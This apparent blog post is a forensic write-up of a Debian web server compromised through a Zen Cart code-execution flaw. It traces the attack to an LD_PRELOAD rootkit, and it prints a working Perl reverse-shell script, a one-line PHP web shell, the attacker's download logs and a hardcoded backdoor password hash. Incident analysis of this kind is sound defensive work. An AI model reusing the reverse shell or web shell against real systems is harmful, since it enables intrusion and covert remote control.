Part 1: Finding the rootkit

It’s monday morning and I am for coffee in downtown Thessaloniki, a partner calls:

– On machine XXX mysqld is not starting since Saturday.

– Can I drink my coffee and come over later to check it ? Is it critical ?

– Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running on ps so I try starting it via the init.d script. Nothing…it hangs while trying to get it started. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. Apt-get process tries to stop mysqld before it replaces it with the older version and it hangs, I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before so I google. Nothing comes up. I check on another debian etch box I have for the output of ldd /usr/sbin/mysqld and no library /lib/ld-linuxv.so.1 comes up. I am definitely watching something that it shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff on the second half of the post). I try to check on some other executables in /sbin with a for i in /usr/sbin/*;do ldd $i; done, all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with another kernel than the one it’s currently using but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt of booting the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced of course. When apt-get procedure calls mkinitramfs in order to create the initramfs image I notice that there are errors saying that it can’t delete /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis

I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk to my box and made an image of each partition using dd:

dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:

mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I run strings to it:

# strings /lib/ld-linuxv.so.1

__gmon_start__

_init

_fini

__cxa_finalize

_Jv_RegisterClasses

execve

dlsym

fopen

fprintf

fclose

puts

system

crypt

strdup

readdir64

strstr

__xstat64

__errno_location

__lxstat64

opendir

login

pututline

open64

pam_open_session

pam_close_session

syslog

vasprintf

getspnam_r

getspnam

getpwnam

pam_authenticate

inssh

gotpass

__libc_start_main

logit

setuid

setgid

seteuid

setegid

read

fwrite

accept

htons

doshell

doconnect

fork

dup2

stdout

fflush

stdin

fscanf

sleep

exit

waitpid

socket

libdl.so.2

libc.so.6

_edata

__bss_start

_end

GLIBC_2.0

GLIBC_2.1.3

GLIBC_2.1

root

@^_]

`^_]

ld.so.preload

ld-linuxv.so.1

_so_cache

execve

/var/opt/_so_cache/ld

%s:%s

Welcome master

crypt

readdir64

__xstat64

__lxstat64

opendir

login

pututline

open64

lastlog

pam_open_session

pam_close_session

syslog

getspnam_r

$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0

getspnam

getpwnam

root

/dev/null

normal

pam_authenticate

pam_get_item

Password:

__libc_start_main

/var/opt/_so_cache/lc

local

/usr/sbin/sshd

/bin/sh

read

write

accept

/usr/sbin/crond

HISTFILE=/dev/null

%99s

$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0

/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) we thought that we had to do with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry; the path of where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:

crypt

readdir64

__xstat64

__l xstat64

opendir

login

pututline

open64

pam_open_session

pam_close_session

syslog

getspnam_r

getspnam

getpwnam

pam_authenticate

pam_get_item

__libc_start_main

read

write

accept

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t provide any outcome at first sight, nothing really striking out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

–01:05:38– http://ABCDEFGHIJ.150m.com/foobar.ext

=> `foobar.ext’

Resolving ABCDEFGHIJ.150m.com… 209.63.57.10

Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 695 [text/plain]

foobar.ext: Permission denied Cannot write to `foobar.ext’ (Permission denied).

–01:05:51– http://ABCDEFGHIJ.150m.com/foobar.ext

=> `foobar.ext’

Resolving ABCDEFGHIJ.150m.com… 209.63.57.10

Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 695 [text/plain] 0K 100% 18.61 MB/s 01:05:51 (18.61 MB/s) – `foobar.ext’ saved [695/695] –01:17:14– http://ABCDEFGHIJ.150m.com/foobar.ext

=> `foobar.ext’

Resolving ABCDEFGHIJ.150m.com… 209.63.57.10

Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 695 [text/plain]

foobar.ext: Permission denied Cannot write to `foobar.ext’ (Permission denied).

–01:17:26– http://ABCDEFGHIJ.150m.com/foobar.ext

=> `foobar.ext’

Resolving ABCDEFGHIJ.150m.com… 209.63.57.10

Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 695 [text/plain] 0K 100% 25.30 MB/s 01:17:26 (25.30 MB/s) – `foobar.ext’ saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.

I downloaded “foobar.ext” from the same url and it was a perl script.

#!/usr/bin/perl

# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source

# Code use Socket; print “[*] Dumping Arguments

”; $host = “A.B.C.D”;

$port = XYZ; if ($ARGV[1]) {

$port = $ARGV[1];

}

print “[*] Connecting…

”; $proto = getprotobyname(‘tcp’) || die(“[-] Unknown Protocol

”); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (“[-] Socket Error

”); my $target = inet_aton($host); if (!connect(SERVER, pack “SnA4x8”, 2, $port, $target)) {

die(“[-] Unable to Connect

”);

}

print “[*] Spawning Shell

”; if (!fork( )) {

open(STDIN,”>&SERVER”);

open(STDOUT,”>&SERVER”);

open(STDERR,”>&SERVER”);

exec {‘/bin/sh’} ‘-bash’ . “\0” x 4;

exit(0);

}

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.

Here are some entries:

A.B.C.D – – [15/Aug/2009:01:05:33 +0300] “GET http://www.domain.com/admin/ HTTP/1.1” 302 – “-” “Mozilla Firefox”

A.B.C.D – – [15/Aug/2009:01:05:34 +0300] “POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1” 200 303 “-” “Mozilla Firefox”

A.B.C.D – – [15/Aug/2009:01:05:34 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 131 “-” “Mozilla Firefox”

A.B.C.D – – [15/Aug/2009:01:05:38 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 – “-” “Mozilla Firefox”

A.B.C.D – – [15/Aug/2009:01:05:47 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 52 “-” “Mozilla Firefox”

A.B.C.D – – [15/Aug/2009:01:05:50 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 – “-” “Mozilla Firefox”

A.B.C.D – – [15/Aug/2009:01:05:51 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 59 “-” “Mozilla Firefox”

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:

<?php system($_SERVER["HTTP_SHELL"]); ?>

This code allows running commands using the account of the user running the apache2 server.

Part 3: Conclusion and food for thought

To conclude on what happened:

1) The attacker used the zencart vulnerability to create the imagedisplay.php file.

2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.

3) Using the imagedisplay.php file he was able to run the server run foobar.ext which is a reverse shell. He could now connect to the machine.

4) Using some local exploit(s) he was probably able to become root.

5) Since he was root he uploaded/compiled ld-linuxv.so.1 and he created /etc/ld.so.preload. Now every executable would first load this “trojaned” library which allows him backdoor access to the box and is hidding from the system. So there is his rootkit 🙂

Fortunately the rootkit had problems and if /var/opt/_so_cache/ directory was not manually created it couldn’t write the lc and ld files inside it. If you created the _so_cache dir then it started logging.

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if he/she put a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the perl script foobar.ext (Use at your own risk. Attacker’s host/ip have been removed from the perl script):linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs